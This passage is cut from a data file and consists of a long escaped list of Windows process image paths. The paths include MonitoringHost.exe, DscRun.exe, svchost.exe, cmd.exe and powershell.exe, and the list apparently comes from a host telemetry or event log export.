Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\appidcertstorecheck.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\UsoClient.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C: